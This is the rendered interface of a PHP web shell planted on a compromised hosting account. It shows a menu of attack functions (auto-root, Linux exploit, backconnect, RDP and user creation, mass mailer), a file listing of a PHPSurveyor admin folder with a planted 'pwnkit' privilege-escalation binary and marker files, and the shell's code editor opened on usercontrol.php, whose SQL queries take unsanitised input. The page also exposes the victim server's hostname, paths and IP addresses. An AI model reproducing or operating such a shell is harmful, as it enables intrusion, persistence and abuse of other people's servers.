Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
formulaires /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.htaccess
139
B
-rwxr--r--
.htaccess.old
142
B
-rwxr--r--
.htpasswd
58
B
-rwxr--r--
.htpasswd.old
22
B
-rwxr--r--
.mad-root
0
B
-rw-r--r--
activate.php
20.19
KB
-rwxr--r--
admin.php
7.94
KB
-rwxr--r--
adminer.php
465.43
KB
-rw-r--r--
adminstyle.css
1.27
KB
-rwxr--r--
assessments.php
8.46
KB
-rwxr--r--
browse.php
25.36
KB
-rwxr--r--
checkfields.php
17.28
KB
-rwxr--r--
conditions.php
26.91
KB
-rwxr--r--
createdb.php
3.39
KB
-rwxr--r--
database.php
33.48
KB
-rwxr--r--
dataentry.php
88.65
KB
-rwxr--r--
dbchecker.php
15.31
KB
-rwxr--r--
dbedit.php
19.4
KB
-rwxr--r--
deactivate.php
6.03
KB
-rwxr--r--
deletesurvey.php
5.78
KB
-rwxr--r--
dumpdb.php
5.11
KB
-rwxr--r--
dumpgroup.php
6.25
KB
-rwxr--r--
dumplabel.php
4.62
KB
-rwxr--r--
dumpquestion.php
5.5
KB
-rwxr--r--
dumpsurvey.php
6.2
KB
-rwxr--r--
export.php
30.1
KB
-rwxr--r--
favicon.ico
894
B
-rwxr--r--
html.php
100.41
KB
-rwxr--r--
importgroup.php
21.69
KB
-rwxr--r--
importlabel.php
8.05
KB
-rwxr--r--
importoldresponses.php
4.94
KB
-rwxr--r--
importquestion.php
16.2
KB
-rwxr--r--
importsurvey.php
31.83
KB
-rwxr--r--
index.php
16.12
KB
-rwxr--r--
info.php
30
B
-rw-r--r--
labels.php
26.27
KB
-rwxr--r--
listcolumn.php
3.25
KB
-rwxr--r--
manual.html
389
B
-r--r--r--
navigator.php
90.1
KB
-rwxr--r--
phpsurveyor.css
5.73
KB
-rwxr--r--
printablesurvey.php
28.13
KB
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
results.php
17.78
KB
-rwxr--r--
resultsdump.php
3.68
KB
-rwxr--r--
saved.php
6.22
KB
-rwxr--r--
sessioncontrol.php
2.07
KB
-rwxr--r--
spss.php
9.38
KB
-rwxr--r--
statistics.php
81.63
KB
-rwxr--r--
templates.php
30.72
KB
-rwxr--r--
tokens.php
61.79
KB
-rwxr--r--
usercontrol.php
7.28
KB
-rwxr--r--
vvexport.php
8.74
KB
-rwxr--r--
vvimport.php
8.67
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : usercontrol.php
<?php /* ############################################################# # >>> PHPSurveyor # ############################################################# # > Author: Jason Cleeland # # > E-mail: jason@cleeland.org # # > Mail: Box 99, Trades Hall, 54 Victoria St, # # > CARLTON SOUTH 3053, AUSTRALIA # > Date: 20 February 2003 # # # # This set of scripts allows you to develop, publish and # # perform data-entry on surveys. # ############################################################# # # # Copyright (C) 2003 Jason Cleeland # # # # This program is free software; you can redistribute # # it and/or modify it under the terms of the GNU General # # Public License as published by the Free Software # # Foundation; either version 2 of the License, or (at your # # option) any later version. # # # # This program is distributed in the hope that it will be # # useful, but WITHOUT ANY WARRANTY; without even the # # implied warranty of MERCHANTABILITY or FITNESS FOR A # # PARTICULAR PURPOSE. See the GNU General Public License # # for more details. # # # # You should have received a copy of the GNU General # # Public License along with this program; if not, write to # # the Free Software Foundation, Inc., 59 Temple Place - # # Suite 330, Boston, MA 02111-1307, USA. # ############################################################# */ if (empty($homedir)) {die("Cannot run this script directly");} if ($accesscontrol <> 1) {exit;} if (!file_exists("$homedir/.htaccess")) { //REDIRECT EVERYTHING HERE IF THERE IS NO .htaccess FILE. if ($action == "setup") { //DON'T DO ANYTHING UNLESS IT HAS BEEN ASKED FOR //CREATE HTACCESS FILE $addsummary = "<br />"._UC_CREATE."<br />\n"; $fname="$homedir/.htaccess"; echo "<font color='white'>"; $handle=fopen($fname, 'a') or die ("<table width='250' border='1' align='center'>\n<tr>\n<td align='center'>\n<strong>"._ERROR."</strong><br />\n"._UC_NOCREATE."\n<p><a href='$scriptname'>"._GO_ADMIN."</a></p>\n</td>\n</tr>\n</table>\n"); echo "</font>"; fputs($handle, $htaccess); fclose($handle); $addsummary .= _UC_SEC_DONE."<br />\n<br />\n"; $addsummary .= "<a href='$scriptname?action=editusers'>"._CONTINUE."</a>\n"; //CREATE DEFAULT USER AND PASS $addsummary = "<br />"._UC_CREATE_DEFAULT."<br />\n"; if (isset($htpasswddir) && $htpasswddir) {$htpasswd = "\"$htpasswddir/htpasswd\"";} else {$htpasswd = "htpasswd";} # Form command line. Redirect STDERR to STDOUT using 2>&1 $command = "$htpasswd -bc .htpasswd $defaultuser $defaultpass 2>&1"; $addsummary .= "<font size='1'>".htmlspecialchars($command)."</font><br />\n<br />\n"; exec($command, $CommandResult, $CommandStatus); if ($CommandStatus) //0=success, for other possibilities see http://httpd.apache.org/docs/programs/htpasswd.html { $addsummary .= "<pre>"; $addsummary .= "\$CommandStatus = $CommandStatus\n"; $addsummary .= "\$CommandResult = \n"; foreach ($CommandResult as $Line) {$addsummary .= "$Line\n";} $addsummary .= "</pre>\n"; } if (file_exists("$homedir/.htpasswd")) { $addsummary .= _UC_UPDATE_TABLE."<br />\n"; $uquery="INSERT INTO {$dbprefix}users VALUES ('$defaultuser', '$defaultpass', '5')"; $uresult=mysql_query($uquery); } else { unlink($fname); $addsummary .= _UC_HTPASSWD_ERROR."<br /><br />\n<font size='1'>"._UC_HTPASSWD_EXPLAIN."<br /></font>\n"; } $addsummary .= "<br />\n<a href='$scriptname?action=editusers'>"._CONTINUE."</a><br /> \n"; } } elseif ($action == "deleteall") { $addsummary = "<br /><strong>"._UC_SEC_REMOVE."..</strong><br />\n"; $fname1="$homedir/.htaccess"; unlink($fname1); $fname1="$homedir/.htpasswd"; unlink($fname1); $dq="DELETE FROM {$dbprefix}users"; $dr=mysql_query($dq); $addsummary .= _UC_ALL_REMOVED; $addsummary .= "<br /><br /><a href='$scriptname'>"._GO_ADMIN."</a><br /> \n"; } elseif ($action == "adduser") { $addsummary = "<br /><strong>"._UC_ADD_USER."</strong><br />\n"; $user=preg_replace("/\W/","",$user); $pass=preg_replace("/\W/","",$pass); if ($user && $pass) { if (isset($htpasswddir) && $htpasswddir) {$htpasswd="\"$htpasswddir/htpasswd\"";} else {$htpasswd="htpasswd";} $command="$htpasswd -b .htpasswd $user $pass 2>&1"; exec($command, $CommandResult, $CommandStatus); if ($CommandStatus) //0=success, for other possibilities see http://httpd.apache.org/docs/programs/htpasswd.html { $addsummary .= "<pre>" . "\$CommandStatus = $CommandStatus\n" . "\$CommandResult = \n"; foreach ($CommandResult as $Line) {$addsummary .= "$Line\n";} $addsummary .= "</pre>\n"; } $uquery = "INSERT INTO {$dbprefix}users VALUES ('$user', '$pass', '{$_POST['level']}')"; $uresult = mysql_query($uquery); $addsummary .= "<br />"._USERNAME.": $user<br />"._PASSWORD.": $pass<br />"; } else { $addsummary .= _UC_ADD_MISSING."<br />\n"; } $addsummary .= "<br /><br /><a href='$scriptname?action=editusers'>"._CONTINUE."</a><br /> \n"; } elseif ($action == "deluser") { $addsummary = "<br /><strong>"._UC_DEL_USER."</strong><br />\n"; if ($user) { $fname="$homedir/.htpasswd"; $htpasswds = file($fname); foreach ($htpasswds as $htp) { list ($fuser, $fpass) = split(":", $htp); if ($fuser == $user) { //$addsummary .= "User found!<br />\n"; } else { $newhtpasswd[]=$htp; } } //WRITE FILE $nfname="$homedir/.htpasswd"; $fp = fopen($nfname,"w"); foreach ($newhtpasswd as $nhtp) { fputs($fp, $nhtp); } fclose($fp); //DELETE USER FROM TABLE $dquery="DELETE FROM {$dbprefix}users WHERE user='$user'"; $dresult=mysql_query($dquery); } else { $addsummary .= "<br />"._UC_DEL_MISSING."<br />\n"; } $addsummary .= "<br /><br /><a href='$scriptname?action=editusers'>"._CONTINUE."</a><br /> \n"; } elseif ($action == "moduser") { $addsummary = "<br /><strong>"._UC_MOD_USER."</strong><br />\n"; $user=preg_replace("/\W/","",$user); $pass=preg_replace("/\W/","",$pass); if ($user && $pass) { //$addsummary .= "Modifying user $user with password $pass<br />\n"; if ($htpasswddir) {$htpasswd = "\"$htpasswddir/htpasswd\"";} else {$htpasswd = "htpasswd";} $command="$htpasswd -b .htpasswd $user $pass 2>&1"; exec($command, $CommandResult, $CommandStatus); if ($CommandStatus) //0=success, for other possibilities see http://httpd.apache.org/docs/programs/htpasswd.html { $addsummary .= "<pre>"; $addsummary .= "\$CommandStatus = $CommandStatus\n"; $addsummary .= "\$CommandResult = \n"; foreach ($CommandResult as $Line) {$addsummary .= "$Line\n";} $addsummary .= "</pre>\n"; } $uquery = "UPDATE {$dbprefix}users SET password='$pass', security='{$_POST['level']}' WHERE user='$user'"; $uresult = mysql_query($uquery); $addsummary .= "<br />"._USERNAME.": $user<br />"._PASSWORD.": $pass<br />\n"; } else { $addsummary .= _UC_MOD_MISSING; } $addsummary .= "<br /><br /><a href='$scriptname?action=editusers'>"._CONTINUE."</a><br /> \n"; } ?>
Close